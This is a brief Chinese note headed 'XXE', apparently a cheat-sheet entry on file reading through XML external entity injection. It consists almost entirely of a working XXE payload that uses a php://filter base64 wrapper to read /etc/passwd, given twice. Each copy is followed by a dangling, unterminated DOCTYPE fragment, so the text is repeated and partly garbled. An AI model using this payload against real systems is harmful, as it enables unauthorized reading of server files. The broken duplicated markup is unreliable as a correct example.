XXE
XXE漏洞的文章网上就很多了
文件读取
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root><name>&xxe;</name></root><!DOCTYPE root[
XXE漏洞的文章网上就很多了
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root><name>&xxe;</name></root><!DOCTYPE root[